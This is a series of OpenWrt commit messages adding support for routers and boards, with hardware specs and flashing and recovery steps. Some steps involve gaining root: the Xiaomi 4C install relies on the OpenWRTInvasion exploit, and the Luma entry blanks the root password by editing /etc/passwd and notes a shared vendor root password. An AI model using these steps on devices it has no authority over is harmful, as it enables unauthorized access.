Device specifications:
* QCA IPQ4018
* 256 MB of RAM
* 32 MB of SPI NOR flash (w25q256)
- 2x 15 MB available; but one of the 15 MB regions is the recovery image
* 2T2R 2.4 GHz
- QCA4019 hw1.0 (SoC)
- requires special BDF in QCA4019/hw1.0/board-2.bin with
* 2T2R 5 GHz
- QCA4019 hw1.0 (SoC)
- requires special BDF in QCA4019/hw1.0/board-2.bin with
* 3x GPIO-LEDs for status (cyan, purple, yellow)
* 1x GPIO-button (reset)
* 1x USB (xHCI)
* TTL pins are on board (arrow points to VCC, then follows: GND, TX, RX)
* 2x gigabit ethernet
- phy@mdio4:
+ Label: Ethernet 1
+ gmac0 (ethaddr) in original firmware
+ used as LAN interface
- phy@mdio3:
+ Label: Ethernet 2
+ gmac1 (eth1addr) in original firmware
+ 802.3af/at POE(+)
+ used as WAN interface
* 12V/24V 1A DC
Flashing instructions:
The tool ap51-flash ( should be
used to transfer the factory image to the u-boot when the device boots up.
Signed-off-by: Marek Lindner <>
[ prepare commit message, rebase, use all LEDs, switch
to dualboot_datachk upgrade script, use eth1 as designated WAN interface]
Signed-off-by: Sven Eckelmann <>
Device specifications:
* Qualcomm/Atheros QCA9533 v2
* 650/600/217 MHz (CPU/DDR/AHB)
* 64 MB of RAM
* 16 MB of SPI NOR flash (mx25l12805d)
- 2x 7 MB available; but one of the 7 MB regions is the recovery image
* 2x 10/100 Mbps Ethernet
* 2T2R 2.4 GHz Wi-Fi
* multi-color LED (controlled via red/green/blue GPIOs)
* 1x GPIO-button (reset)
* external h/w watchdog (enabled by default)
* TTL pins are on board (arrow points to VCC, then follows: GND, TX, RX)
* 2x fast ethernet
- eth0
+ Label: Ethernet 1
+ 24V passive POE (mode B)
+ used as WAN interface
- eth1
+ Label: Ethernet 2
+ 802.3af POE
+ builtin switch port 2
+ used as LAN interface
* 12-24V 1A DC
* external antennas
Flashing instructions:
The tool ap51-flash ( should be
used to transfer the factory image to the u-boot when the device boots up.
Signed-off-by: Sven Eckelmann <>
Device specifications:
* Qualcomm/Atheros QCA9533 v2
* 650/600/217 MHz (CPU/DDR/AHB)
* 64 MB of RAM
* 16 MB of SPI NOR flash (mx25l12805d)
- 2x 7 MB available; but one of the 7 MB regions is the recovery image
* 2x 10/100 Mbps Ethernet
* 2T2R 2.4 GHz Wi-Fi
* multi-color LED (controlled via red/green/blue GPIOs)
* 1x GPIO-button (reset)
* external h/w watchdog (enabled by default)
* TTL pins are on board (arrow points to VCC, then follows: GND, TX, RX)
* 2x fast ethernet
- eth0
+ Label: Ethernet 1
+ 24V passive POE (mode B)
+ used as WAN interface
- eth1
+ Label: Ethernet 2
+ 802.3af POE
+ builtin switch port 2
+ used as LAN interface
* 12-24V 1A DC
* internal antennas
Flashing instructions:
The tool ap51-flash ( should be
used to transfer the factory image to the u-boot when the device boots up.
Signed-off-by: Sven Eckelmann <>
Engenius ECB350 v1 is an indoor wireless access point with a gigabit ethernet port,
2.4 GHz wireless, external antennas, and PoE.
- AR7242 SOC
- AR9283 WLAN 2.4 GHz (2x2), PCIe on-board
- AR8035-A switch RGMII, GbE with 802.3af PoE
- 40 MHz reference clock
- 8 MB FLASH 25L6406EM2I-12G
- 32 MB RAM
- UART at J2 (populated)
- 2 external antennas
- 3 LEDs, 1 button (power, lan, wlan) (reset)
**MAC addresses:**
MACs are labeled as WLAN and WAN
vendor MAC addresses in flash are duplicate
phy0 WLAN *:b8 ---
eth0 WAN *:b9 art 0x0/0x6
- if you get Failsafe Mode from failed flash:
only use it to flash Original firmware from Engenius
or risk kernel loop or halt which requires serial cable
Method 1: Firmware upgrade page:
OEM webpage at
username and password "admin"
Navigate to "Firmware" page from left pane
Click Browse and select the factory.bin image
Upload and verify checksum
Click Continue to confirm and wait 3 minutes
Method 2: Serial to load Failsafe webpage:
After connecting to serial console and rebooting...
Interrupt uboot with any key pressed rapidly
execute `run failsafe_boot` OR `bootm 0x9f670000`
wait a minute
connect to ethernet and navigate to
Select the factory.bin image and upload
wait about 3 minutes
**Return to OEM:**
If you have a serial cable, see Serial Failsafe instructions
otherwise, uboot-env can be used to make uboot load the failsafe image
The Failsafe image is unique to Engenius boards.
If the failsafe image is missing or damaged this will not work
DO NOT downgrade to ar71xx this way, it can cause kernel loop or halt
ssh into openwrt and run
`fw_setenv rootfs_checksum 0`
reboot, wait 3 minutes
connect to ethernet and navigate to
select OEM firmware image from Engenius and click upgrade
**TFTP recovery** (unstable / not reliable):
rename initramfs to 'vmlinux-art-ramdisk'
make available on TFTP server at
power board while holding or pressing reset button repeatedly
NOTE: for some Engenius boards TFTP is not reliable
try setting MTU to 600 and try many times
**Format of OEM firmware image:**
The OEM software of ECB350 v1 is a heavily modified version
of Openwrt Kamikaze. One of the many modifications
is to the sysupgrade program. Image verification is performed
by the successful ungzip and untar of the supplied file
and name check and header verification of the resulting contents.
To form a factory.bin that is accepted by OEM Openwrt build,
the kernel and rootfs must have specific names
and begin with the respective headers (uImage, squashfs).
Then the files must be tarballed and gzipped.
The resulting binary is actually a tar.gz file in disguise.
This can be verified by using binwalk on the OEM firmware images,
ungzipping then untaring.
The OEM upgrade script is at /etc/
OKLI kernel loader is required because the OEM software
expects the kernel size to be no greater than 1536k
and otherwise the factory.bin upgrade procedure would
overwrite part of the kernel when writing rootfs.
The factory upgrade script follows the original mtd partitions.
**Note on PLL-data cells:**
The default PLL register values will not work
because of the AR8035 switch between
the SOC and the ethernet port.
For AR724x series, the PLL register for GMAC0
can be seen in the DTSI as 0x2c.
Therefore the PLL register can be read from u-boot
for each link speed after attempting tftpboot
or another network action using that link speed
with `md 0x1805002c 1`
However the registers that u-boot sets are not ideal and sometimes wrong...
the at803x driver supports setting the RGMII clock/data delay on the PHY side.
This way the pll-data register only needs to handle invert and phase.
for this board no extra adjustements are needed on the MAC side
all link speeds functional
Signed-off-by: Michael Pratt <>
Engenius ECB1200 is an indoor wireless access point with a GbE port,
2.4 GHz and 5 GHz wireless, external antennas, and 802.3af PoE.
- QCA9557 SOC MIPS, 2.4 GHz (2x2)
- QCA9882 WLAN PCIe card, 5 GHz (2x2)
- AR8035-A switch RGMII, GbE with 802.3af PoE, 25 MHz clock
- 40 MHz reference clock
- 16 MB FLASH 25L12845EMI-10G
- 2x 64 MB RAM 1538ZFZ V59C1512164QEJ25
- UART at JP1 (unpopulated, RX shorted to ground)
- 4 external antennas
- 4 LEDs, 1 button (power, eth, wifi2g, wifi5g) (reset)
**MAC addresses:**
MAC Addresses are labeled as ETH and 5GHZ
U-boot environment has the vendor MAC addresses
MAC addresses in ART do not match vendor
eth0 ETH *:5c u-boot-env ethaddr
phy0 5GHZ *:5d u-boot-env athaddr
---- ---- ???? art 0x0/0x6
Method 1: Firmware upgrade page:
OEM webpage at
username and password "admin"
Navigate to "Firmware" page from left pane
Click Browse and select the factory.bin image
Upload and verify checksum
Click Continue to confirm and wait 3 minutes
Method 2: Serial to load Failsafe webpage:
After connecting to serial console and rebooting...
Interrupt uboot with any key pressed rapidly
(see TFTP recovery)
perform a sysupgrade
**Serial Access:**
the RX line on the board for UART is shorted to ground by resistor R176
therefore it must be removed to use the console
but it is not necessary to remove to view boot log
optionally, R175 can be replaced with a solder bridge short
the resistors R175 and R176 are next to the UART pinout at JP1
**Return to OEM:**
If you have a serial cable, see Serial Failsafe instructions
Unlike most Engenius boards, this does not have a 'failsafe' image
the only way to return to OEM is TFTP or serial access to u-boot
**TFTP recovery:**
Unlike most Engenius boards, TFTP is reliable here
rename initramfs-kernel.bin to 'ap.bin'
make the file available on a TFTP server at
power board while holding or pressing reset button repeatedly
or with serial access:
run `tftpboot` or `run factory_boot` with initramfs-kernel.bin
then `bootm` with the load address
**Format of OEM firmware image:**
The OEM software of ECB1200 is a heavily modified version
of Openwrt Altitude Adjustment 12.09.
This Engenius board, like ECB1750, uses a proprietary header
with a unique Product ID. The header for factory.bin is
generated by the mksenaofw program included in openwrt.
**Note on PLL-data cells:**
The default PLL register values will not work
because of the AR8035 switch between
the SOC and the ethernet port.
For QCA955x series, the PLL registers for eth0 and eth1
can be see in the DTSI as 0x28 and 0x48 respectively.
Therefore the PLL registers can be read from uboot
for each link speed after attempting tftpboot
or another network action using that link speed
with `md 0x18050028 1` and `md 0x18050048 1`.
However the registers that u-boot sets are not ideal and sometimes wrong...
the at803x driver supports setting the RGMII clock/data delay on the PHY side.
This way the pll-data register only needs to handle invert and phase.
for this board clock invert is needed on the MAC side
all link speeds functional
Signed-off-by: Michael Pratt <>
Engenius ESR600H is an indoor wireless router with a gigabit switch,
2.4 GHz and 5 GHz wireless, internal and external antennas, and a USB port.
- RT3662F MIPS SOC, 5 GHz WMAC (2x2)
- RT5392L PCI on-board, 2.4 GHz (2x2)
- AR8327 RGMII, 7-port GbE, 25 MHz clock
- 40 MHz reference clock
- 8 MB FLASH 25L6406EM2I-12G
- 64 MB RAM
- UART at J12 (unpopulated)
- 2 internal antennas (5 GHz)
- 2 external antennas (2.4 GHz)
- 9 LEDs, 1 button (power, wps, wifi2g, wifi5g, 5 LAN/WAN)
- USB 2 port (GPIO controlled power)
**MAC addresses:**
MAC Addresses are labeled as WAN and WLAN
U-boot environment has the the vendor MAC address for ethernet
MAC addresses in "factory" are part of wifi calibration data
eth0.2 WAN *:13:e7 u-boot-env wanaddr
eth0.1 ---- *:13:e8 u-boot-env wanaddr + 1
phy0 WLAN *:14:b8 factory 0x8004
phy1 ---- *:14:bc factory 0x4
Method 1: Firmware upgrade page
OEM webpage at
username and password "admin"
Navigate to Network Setting --> Tools --> Firmware
Click Browse and select the factory.dlf image
Click Continue to confirm and wait 6 minutes or more...
Method 2: Serial console to load TFTP image:
(see TFTP recovery)
**Return to OEM:**
Unlike most Engenius boards, this does not have a 'failsafe' image
the only way to return to OEM is serial access to uboot
Unlike most Engenius boards, public images are not available...
so the only way to return to OEM is to have a copy
of the MTD partition "firmware" BEFORE flashing openwrt.
**TFTP recovery:**
Unlike most Engenius boards, TFTP is reliable here
however it requires serial console access
(soldering pins to the UART pinouts)
build your own image...
with 'ramdisk' selected under 'Target Images'
rename initramfs-kernel.bin to 'uImageESR-600H'
make the file available on a TFTP server at
interrupt boot by holding or pressing '4' in serial console
as soon as board is powered on
`tftpboot 0x81000000`
`bootm 0x81000000`
perform a sysupgrade
**Format of OEM firmware image:**
This Engenius board uses the Senao proprietary header
with a unique Product ID. The header for factory.bin is
generated by the mksenaofw program included in openwrt.
.dlf file extension is also required for OEM software to accept it
**Note on using OKLI:**
the kernel is now too large for the bootloader to handle
so OKLI is used via the `kernel-loader` image command
recently in master several other ramips boards have the same problem
'Kernel panic - not syncing: Failed to find ralink,rt3883-sysc node'
see commit ad19751edc
Signed-off-by: Michael Pratt <>
This fixes error when host GCC >= 10.
/usr/bin/ld: scripts/dtc/ multiple definition of `yylloc'; scripts/dtc/dtc-lexer.lex.o:(.bss+0x0): first defined here
collect2: error: ld returned 1 exit status
Signed-off-by: Tomasz Maciej Nowak <>
gcc 10 defaults to -fno-common, which causes an error
when linking.
Back-port the following Linux kernel commit to fix it:
e33a814e772c (scripts/dtc: Remove redundant YYLOC global declaration)
Tested on an Arch Linux host with gcc 10.1.0
Signed-off-by: Luis Araneda <>
This updates uboot-envtools with the updated names from ramips
Fixes: 6d4382711a ("ramips: use full names for Xiaomi Mi Router devices")
Signed-off-by: Adrian Schmutzler <>
The include/ file is based on the
include/ file and should be used to build a Trusted Firmware-A
(TFA) which was previously named Arm trusted firmware.
This is useful for targets where the TFA is board specific like for
Marvell SoCs and probably also NXP Layerscape SoCs.
This also makes use of this abstraction in the
arm-trusted-firmware-mvebu package to build board specific ATF binaries.
The ATF binaries will be automatically activated and build when the
board is selected in the normal build or all boards are selected. This
should also activate the build when build bot creates images.
Signed-off-by: Hauke Mehrtens <>
This commit adds support for Xiaomi's Mi Router 4C device.
- CPU: MediaTek MT7628AN (580MHz)
- Flash: 16MB
- RAM: 64MB DDR2
- 2.4 GHz: IEEE 802.11b/g/n with Integrated LNA and PA
- Antennas: 4x external single band antennas
- WAN: 1x 10/100M
- LAN: 2x 10/100M
- LEDs: 2x yellow/blue. Programmable (labelled as power on case)
- Non-programmable (shows WAN activity)
- Button: Reset
How to install:
1- Use OpenWRTInvasion to gain telnet and ftp access.
2- Push openwrt firmware to /tmp/ using ftp.
3- Connect to router using telnet. (IP: -
Username: root - No password)
4- Use command "mtd -r write /tmp/firmware.bin OS1" to flash into
the router..
5- It takes around 2 minutes. After that router will restart itself
to OpenWrt.
Signed-off-by: Ataberk Özen <>
[wrap commit message, bump PKG_RELEASE for uboot-envtools, remove
dts-v1 from DTS, fix LED labels]
Signed-off-by: Adrian Schmutzler <>
Engenius EAP300 v2 is an indoor wireless access point with a
100/10-BaseT ethernet port, 2.4 GHz wireless, internal antennas,
and 802.3af PoE.
- AR9341
- 40 MHz reference clock
- 16 MB FLASH MX25L12845EMI-10G
- 64 MB RAM
- UART at J1 (populated)
- Ethernet port with POE
- internal antennas
- 3 LEDs, 1 button (power, eth, wlan) (reset)
**MAC addresses:**
phy0 *:d3 art 0x1002 (label)
eth0 *:d4 art 0x0/0x6
- if you get Failsafe Mode from failed flash:
only use it to flash Original firmware from Engenius
or risk kernel loop or halt which requires serial cable
Method 1: Firmware upgrade page:
OEM webpage at
username and password "admin"
Navigate to "Firmware" page from left pane
Click Browse and select the factory.bin image
Upload and verify checksum
Click Continue to confirm and wait 3 minutes
Method 2: Serial to load Failsafe webpage:
After connecting to serial console and rebooting...
Interrupt uboot with any key pressed rapidly
execute `run failsafe_boot` OR `bootm 0x9fdf0000`
wait a minute
connect to ethernet and navigate to
Select the factory.bin image and upload
wait about 3 minutes
**Return to OEM:**
If you have a serial cable, see Serial Failsafe instructions
The Failsafe image is unique to Engenius boards.
If the failsafe image is missing or damaged this will not work
DO NOT downgrade to ar71xx this way, can cause kernel loop or halt
The easiest way to return to the OEM software is the Failsafe image
If you dont have a serial cable, you can ssh into openwrt and run
`mtd -r erase fakeroot`
Wait 3 minutes
connect to ethernet and navigate to
select OEM firmware image from Engenius and click upgrade
**TFTP recovery** (unstable / not reliable):
rename initramfs to 'vmlinux-art-ramdisk'
make available on TFTP server at
power board while holding or pressing reset button repeatedly
NOTE: for some Engenius boards TFTP is not reliable
try setting MTU to 600 and try many times
**Format of OEM firmware image:**
The OEM software of EAP300 v2 is a heavily modified version
of Openwrt Kamikaze. One of the many modifications
is to the sysupgrade program. Image verification is performed
simply by the successful ungzip and untar of the supplied file
and name check and header verification of the resulting contents.
To form a factory.bin that is accepted by OEM Openwrt build,
the kernel and rootfs must have specific names
and begin with the respective headers (uImage, squashfs).
Then the files must be tarballed and gzipped.
The resulting binary is actually a tar.gz file in disguise.
This can be verified by using binwalk on the OEM firmware images,
ungzipping then untaring.
The OEM upgrade script is at /etc/
OKLI kernel loader is required because the OEM software
expects the kernel size to be no greater than 1536k
and otherwise the factory.bin upgrade procedure would
overwrite part of the kernel when writing rootfs.
Signed-off-by: Michael Pratt <>
[clarify MAC address section, bump PKG_RELEASE for uboot-envtools]
Signed-off-by: Adrian Schmutzler <>
Replace my email address.
I'm still available at the old address.
Signed-off-by: Tomasz Maciej Nowak <>
[rephrase commit title/message]
Signed-off-by: Adrian Schmutzler <>
This patch adds support for Globalscale ESPRESSObin-Ultra. Device uses
the same Armada-3720 SoC with extended hardware support.
- SoC: Armada-3720
- RAM: 1 GB DDR4
- Flash: 4MB SPI NOR (mx25u3235f) + 8 GB eMMC
- Ethernet: Topaz 6341 88e6341 (4x GB LAN + 1x WAN with 30W PoE)
- WiFI: 2x2 802.11ac Wi-Fi marvell (88w8997 PCIe+USB)
- 1x USB 2.0 port
- 1x USB 3.0 port
- 1x microSD slot
- 1x mini-PCIe slot (USB [with nano-sim slot])
- 1x mini-USB debug UART
- 1x RTC Clock and battery
- 1x reset button
- 1x power button
- 4x LED (RGBY)
- Optional 1x M.2 2280 slot
** Installation **
Copy dtb from build_dir to bin/ and run tftpserver there:
$ cp ./build_dir/target-aarch64_cortex-a53_musl/linux-mvebu_cortexa53/
$ in.tftpd -L -s bin/targets/mvebu/cortexa53/
Connect to the device UART via microUSB port on the back side and power on the device.
Power on the device and hit any key to stop the autoboot.
Set serverip (host IP) and ipaddr (any free IP address on the same subnet), e.g:
$ setenv serverip # Host
$ setenv ipaddr # Device
Ping server to confirm network is working:
$ ping $serverip
Using neta@30000 device
host is alive
Tftpboot the firmware:
$ tftpboot $kernel_addr_r openwrt-mvebu-cortexa53-globalscale_espressobin-ultra-initramfs-kernel.bin
$ tftpboot $fdt_addr_r armada-3720-espressobin-ultra.dtb
Set the console and boot the image:
$ setenv bootargs $console
$ booti $kernel_addr_r - $fdt_addr_r
Once the initramfs is booted, transfer openwrt-mvebu-cortexa53-globalscale_espressobin-ultra-squashfs-sdcard.img.gz
to /tmp dir on the device.
Gunzip and dd the image:
$ gunzip /tmp/openwrt-mvebu-cortexa53-globalscale_espressobin-ultra-squashfs-sdcard.img.gz
$ dd if=/tmp/openwrt-mvebu-cortexa53-globalscale_espressobin-ultra-squashfs-sdcard.img of=/dev/mmcblk0 && sync
Reboot the device.
Signed-off-by: Vladimir Vid <>
This will make developing process easier, because dtb will be included
into image.
Not need to enable initramfs image by default.
Signed-off-by: Pawel Dembicki <>
Add support for the following devices:
- Xiaomi Mi Wi-Fi Router 3G v2
- Xiaomi Mi Router 4A Gigabit Edition
Signed-off-by: Antonis Kanouras <>
[add explicit case for 4A, bump PKG_RELEASE,
improve commit title/message]
Signed-off-by: Adrian Schmutzler <>
Update tfa to LSDK-20.04-update-290520.
Signed-off-by: Biwen Li <>
Signed-off-by: Yangbo Lu <>
[fix PKG_RELEASE bump]
Signed-off-by: Adrian Schmutzler <>
Update u-boot to LSDK-20.04-update-290520.
Signed-off-by: Biwen Li <>
Signed-off-by: Yangbo Lu <>
[fix PKG_RELEASE bump]
Signed-off-by: Adrian Schmutzler <>
At this moment layerscape images are ext4 only. It causes problem with
save changes durring sysupgrade and make "firstboot" and failsafe mode
This patch changes sd-card images to squashfs + f2fs combined images.
To make place, for saving config, kernel space ar now ext4 partition
with fit kernel.
This method of image generation is similar to rest of OpenWrt sd-card
Reviewed-by: Yangbo Lu <>
Signed-off-by: Pawel Dembicki <>
[reword README, reword DEVICE_COMPAT_MESSAGE, keep original indent]
Signed-off-by: Adrian Schmutzler <>
At this moment sysupgrade replaces only kernel and rootfs.
This patch add dtb part to sysupgrade images to avoid situation
when old dtb make system broken.
Is possible to sysupgrade older images for NOR devices:
1. Firmware partition in bootargs need to be updated to:
"49m@0xf00000(firmware)". Env should be saved after changes.
2. After step one, "sysupgrade -F" will work.
Run tested: LS1046A-RDB
Reviewed-by: Yangbo Lu <>
Signed-off-by: Pawel Dembicki <>
[bump PKG_RELEASE for uboot-layerscape]
Signed-off-by: Adrian Schmutzler <>
The board was renamed without changing the BUILD_DEVICES in the U-Boot
Makefile, this broken the build.
Fixes: 0830ae3a2f ("sunxi: Correct manufacturer name to Sinovoip")
Signed-off-by: Hauke Mehrtens <>
- CPU: Allwinner H3, Quad-core Cortex-A7 Up to 1.2GHz
- DDR3 RAM: 512MB/1GB
- Network:
10/100/1000M Ethernet x 1,
10/100M Ethernet x 1
- WiFi: 802.11b/g/n, with SMA antenna interface
- USB Host: Type-A x2
- MicroSD Slot x 1
- MicroUSB: for OTG and power input
- Debug Serial Port: 3Pin 2.54mm pitch pin-header
- LED:
- KEY:
- Power Supply: DC 5V/2A
- Write the image to SD Card with dd
- Boot NanoPi from the SD Card
Signed-off-by: Jayantajit Gogoi <>
CPU: Allwinner H3, Quad-core Cortex-A7 Up to 1.2GHz
DDR3 RAM: 256MB/512MB
Connectivity: 10/100/1000Mbps Ethernet
USB Host: Type-A x 1
MicroSD Slot x 1
MicroUSB: for power input only
Debug Serial Port: 4Pin, 2.54 mm pitch pin header
Power Supply: DC 5V/2A
PCB Dimension: 40 x 40 x 1.2mm
Burn the image file to an SD Card with dd or any image burning tool
Boot ZeroPi from the SD Card
The following features are working and tested:
Ethernet port 10/100/1000M Ethernet
Remarks: SBC is mostly compatible and boots with FriendlyARM NanoPI M1 plus DTS also (zeropi has no working hdmi)
Signed-off-by: Arturas Moskvinas <>
Mainline u-boot dynamically passes the mtd partitions via devicetree:
$ cat /proc/mtd
dev: size erasesize name
mtd0: 003f0000 00001000 "firmware"
mtd1: 00010000 00001000 "u-boot-env"
Add support for this setup.
Signed-off-by: Andre Heider <>
u-boot binaries are not useful for these boards, they need to be combined
with atf for a proper firmware.
Signed-off-by: Andre Heider <>
u-boot binaries for this SoC are only required for the atf package,
disable them per default so they don't get build unnecessarily.
Signed-off-by: Andre Heider <>
Fixes the build error:
/usr/bin/ld: scripts/dtc/ multiple definition of `yylloc'; scripts/dtc/dtc-lexer.lex.o:(.bss+0x0): first defined here
collect2: error: ld returned 1 exit status
Successfully tested on boneblack.
Signed-off-by: Andre Heider <>
This reverts commit bda6f6572b.
This commit breaks the onboard ethernet on some units. Revert it for
Signed-off-by: David Bauer <>
LS1012A-FRDM have configured wrong fdt_high value.
That causes impossibility of booting.
This patch fix it.
Signed-off-by: Pawel Dembicki <>
Reviewed-by: Yangbo Lu <>
Signed-off-by: Adrian Schmutzler <>
Update the patches required for the NanoPi R2S to match the DTS accepted
for upstream Linux. The U-Boot patch meanwhile is still pending
Signed-off-by: David Bauer <>
The Linksys MR8300 is based on QCA4019 and QCA9888
and provides three, independent radios.
NAND provides two, alternate kernel/firmware images
with fail-over provided by the OEM U-Boot.
Hardware Highlights:
SoC: IPQ4019 at 717 MHz (4 CPUs)
SoC: Qualcomm IPQ4019 at 717 MHz (4 CPUs)
RAM: 512M DDR3
FLASH: 256 MB NAND (Winbond W29N02GV, 8-bit parallel)
ETH: Qualcomm QCA8075 (4x GigE LAN, 1x GigE Internet Ethernet Jacks)
BTN: Reset and WPS
USB: USB3.0, single port on rear with LED
SERIAL: Serial pads internal (unpopulated)
LED: Four status lights on top + USB LED
WIFI1: 2x2:2 QCA4019 2.4 GHz radio on ch. 1-14
WIFI2: 2x2:2 QCA4019 5 GHz radio on ch. 36-64
WIFI3: 2x2:2 QCA9888 5 GHz radio on ch. 100-165
Support is based on the already supported EA8300.
Key differences:
EA8300 has 256MB RAM where MR8300 has 512MB RAM.
MR8300 has a revised top panel LED setup.
"Factory" images may be installed directly through the OEM GUI using
URL: https://ip-of-router/fwupdate.html (Typically
Signed-off-by: Hans Geiblinger <>
[copied Hardware-highlights from EA8300. Fixed alphabetical order.
fixed commit subject, removed bogus unit-address of keys,
fixed author (used Signed-off-By to From:) ]
Signed-off-by: Christian Lamparter <>
Luma Home WRTQ-329ACN, also known as Luma WiFi System, is a dual-band
wireless access point.
SoC: Qualcomm Atheros IPQ4018
RAM: 256 MB DDR3
Flash: 2 MB SPI NOR
WIFI: 2.4 GHz 2T2R integrated
5 GHz 2T2R integrated
Ethernet: 2x 10/100/1000 Mbps QCA8075
USB: 1x 2.0
Bluetooth: 1x 4.0 CSR8510 A10, connected to USB bus
LEDS: 16x multicolor LEDs ring, controlled by MSP430G2403 MCU
Buttons: 1x GPIO controlled
EEPROM: 16 Kbit, compatible with AT24C16
UART: row of 4 holes marked on PCB as J19, starting count from the side
of J19 marking on PCB
1. GND, 2. RX, 3. TX, 4. 3.3V
baud: 115200, parity: none, flow control: none
The device supports OTA or USB flash drive updates, unfotunately they
are signed. Until the signing key is known, the UART access is mandatory
for installation. The difficult part is disassembling the casing, there
are a lot of latches holding it together.
Prepare three thin, but sturdy, prying tools. Place the device with back
of it facing upwards. Start with the wall having a small notch. Insert
first tool, until You'll feel resistance and keep it there. Repeat the
procedure for neighbouring walls. With applying a pressure, one edge of
the back cover should pop up. Now carefully slide one of the tools to
free the rest of the latches.
There's no need to solder pins to the UART holes, You can use hook clips,
but wiring them outside the casing, will ease debuging and recovery if
problems occur.
1. Prepare TFTP server with OpenWrt initramfs image.
2. Connect to UART port (don't connect the voltage pin).
3. Connect to LAN port.
4. Power on the device, carefully observe the console output and when
asked quickly enter the failsafe mode.
5. Invoke 'mount_root'.
6. After the overlayfs is mounted run:
fw_setenv bootdelay 3
This will allow to access U-Boot shell.
7. Reboot the device and when prompted to stop autoboot, hit any key.
8. Adjust "ipaddr" and "serverip" addresses in U-Boot environment, use
'setenv' to do that, then run following commands:
tftpboot 0x84000000 <openwrt_initramfs_image_name>
bootm 0x84000000
and wait till OpenWrt boots.
9. In OpenWrt command line run following commands:
fw_setenv openwrt "setenv mtdids nand1=spi_nand; setenv mtdparts mtdparts=spi_nand:-(ubi); ubi part ubi; ubi read 0x84000000 kernel; bootm 0x84000000"
fw_setenv bootcmd "run openwrt"
10. Transfer OpenWrt sysupgrade image to /tmp directory and flash it
ubirmvol /dev/ubi0 -N ubi_rootfs
sysupgrade -v -n /tmp/<openwrt_sysupgrade_image_name>
11. After flashing, the access point will reboot to OpenWrt, then it's
ready for configuration.
Reverting to OEM firmware
1. Execute installation guide steps: 1, 2, 3, 7, 8.
2. In OpenWrt command line run following commands:
ubirmvol /dev/ubi0 -N rootfs_data
ubirmvol /dev/ubi0 -N rootfs
ubirmvol /dev/ubi0 -N kernel
ubirename /dev/ubi0 kernel1 kernel ubi_rootfs1 ubi_rootfs
ubimkvol /dev/ubi0 -S 34 -N kernel1
ubimkvol /dev/ubi0 -S 320 -N ubi_rootfs1
ubimkvol /dev/ubi0 -S 264 -N rootfs_data
fw_setenv bootcmd bootipq
3. Reboot.
Known issues
The LEDs ring doesn't have any dedicated driver or application to control
it, the only available option atm is to manipulate it with 'i2cset'
command. The default action after applying power to device is spinning
blue light. This light will stay active at all time. To disable it
install 'i2c-tools' with opkg and run:
i2cset -y 2 0x48 3 1 0 0 i
The light will stay off until next cold boot.
Additional information
After completing 5. step from installation guide, one can disable asking
for root password on OEM firmware by running:
sed -e 's/root❌/root::/' -i /etc/passwd
This is useful for investigating the OEM firmware. One can look
at the communication between the stock firmware and the vendor's
cloud servers or as a way of making a backup of both flash chips.
The root password seems to be constant across all sold devices.
This is output of 'led_ctl' from OEM firmware to illustrate
possibilities of LEDs ring:
Usage: led_ctl [status | upgrade | force_upgrade | version]
led_ctl solid COLOR <brightness>
led_ctl single COLOR INDEX <brightness 0 - 15>
led_ctl spinning COLOR <period 1 - 16 (lower = faster)>
led_ctl fill COLOR <period 1 - 16 (lower = faster)>
( default is 5 )
led_ctl flashing COLOR <on dur 1 - 128> <off dur 1 - 128>
(default is 34) ( default is 34 )
led_ctl pulsing COLOR
COLOR: red, green, blue, yellow, purple, cyan, white
Signed-off-by: Tomasz Maciej Nowak <>
[squash "ipq-wifi: add BDFs for Luma Home WRTQ-329ACN" into commit,
changed ubi volumes for easier integration, slightly reworded
commit message, changed ubi volume layout to use standard names all
Signed-off-by: Christian Lamparter <>
This submission relied heavily on the work of
Santiago Rodriguez-Papa <contact at>
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Winbond W632GG6MB-12 (256M DDR3-1600)
* Flash: Winbond W29N01HVSINA (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7603E/MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-deatachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: J. Scott Heppler <>
We want to be able to make full system images for this system too, just
as we now can for the MT7623 platforms.
The package directory (mt7623n) is now a bit misnamed as it's overly
specific, but the precise set of platforms which we support this way
is evolving and we'll fix it up when the dust settles and we know what
nomenclature makes most sense.
Signed-off-by: David Woodhouse <>
Update to current head of the branch A3700_utils-armada-18.12-fixed:
0967979 ddr: Add DDR3 2CS layout for EspressoBin v5 2GB board
486523e ddr: fix typo for ESPRESSObin 2GB layout
490b2b3 TBB: Fix building for Crypto++ 6.0 and later
0141dd1 TBB: Split INCDIR from LIBDIR
Signed-off-by: Andre Heider <>
Lift the dependency on the build order, where flash-image.bin may be missing
from the u-boot dir.
While at it, also install the uart images for rescue purposes.
Signed-off-by: Andre Heider <>
This is the most popular choice in the linux kernel tree.
Within OpenWrt, this change will establish consistency with ath79
and ramips targets.
Signed-off-by: Martin Schiller <>
[extend commit message, include netgear_dm200, update base-files]
Signed-off-by: Adrian Schmutzler <>
This patch adds support for the Edgecore ECW5211 indoor AP.
- SoC: Qualcomm Atheros IPQ4018 ARMv7-A 4x Cortex A-7
- RAM: 256MB DDR3
- NOR Flash: 16MB SPI NOR
- Ethernet: 2 x 1G via Q8075 PHY connected to ethernet adapter via PSGMII (802.3af POE IN on eth0)
- USB: 1 x USB 3.0 SuperSpeed
- WLAN: Built-in IPQ4018 (2x2 802.11bng, 2x2 802.11 acn)
- CC2540 BLE connected to USB 2.0 port
- Atmel AT97SC3205T I2C TPM
Signed-off-by: Robert Marko <>
This patch adds support for the Edgecore ECW5410 indoor AP.
- SoC: Qualcomm Atheros IPQ8068 ARMv7 2x Cortex A-15
- RAM: 256MB(225 usable) DDR3
- NOR Flash: 16MB SPI NOR
- NAND Flash: 128MB S34MS01G2 Parallel NAND
- Ethernet: 2 x 1G via 2x AR8033 PHY-s connected directly to GMAC2 and GMAC3 via SGMII (802.3af POE IN on eth0)
- USB: 1 x USB 3.0 SuperSpeed
